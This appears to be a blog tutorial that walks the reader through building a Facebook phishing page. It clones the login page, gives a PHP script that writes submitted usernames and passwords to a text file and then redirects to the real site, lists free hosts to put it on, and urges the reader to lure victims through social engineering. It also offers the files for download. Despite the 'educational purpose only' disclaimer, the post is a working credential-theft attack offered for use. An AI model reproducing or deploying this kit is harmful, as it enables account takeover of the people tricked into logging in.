Labels
Posted by

Facebook Phishing!

I won't be wasting time on jibber jabbing, straight way follow the steps below.


Read about phishing here if curious :  https://www.owasp.org/index.php/Phishing


Step 1:

View Source Code of Facebook login page i.e www.facebook.com by writing view-source: before the link.

In nutshell go to this link: view-source:www.facebook.com

Step 2:

Copy the whole text in "view-source:www.facebook.com" and paste in notepad.
Press Ctrl+F to open Find window and search for ---> action= 


replace the URL "http://www.facebook.com/login.php?" with just "login.php" and save the file as index.html.

Step 3:
Now open a new notepad screen and paste the below php script that does the phishing work for you i.e steal data:
<?php
header("Location: http://www.Facebook.com/login.php ");
$hexCoder = fopen("details.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($hexCoder, $variable);
fwrite($hexCoder, "=");
fwrite($hexCoder, $value);
fwrite($hexCoder, "\r\n");
}
fwrite($hexCoder, "\r\n");
fclose($hexCoder);
exit;
?>
Save this file as index.html (this file will be placed in root folder later)
 Step 4:
Create a simple -blank- text file and save it as details.txt

Step 5:

Now what you have to do is to host the files in some php enabled hosting.


  • www.hostinger.in/
  • www.000webhost.com/
  • www.webs.com/
  • www.5gbfree.com/
  • www.website.org/
etc, search more on google
Step6:
Keep in mind that you have to place all files in root folder and ensure that you can access your index.php file like this:
             www.your_domain.subdomain.com/index.html
and it shows the customized facebook page.
The files you will be placing in server are:
  • index.html
  • details.txt
  • login.php
Step7:
This is in a way the most important step, use social engineering to lure your victim to login facebook via your (www.your_domain.subdomain.com/index.html) link
(You can do this by any way you want like: Save it as a homepage in your computer and ask someone to login through your computer)

Ones someone opens and logins through your link, the details get logged in the details.txt file.
Open that file and see what you want. !!!

Enjoy!

--> above files made for you are available here for download:click to download !!!

NOTE: For Educational Purpose only, use at your own responsibility.

Queries are welcome in comment section. 
Labels:

Comments

Post a Comment

Popular Posts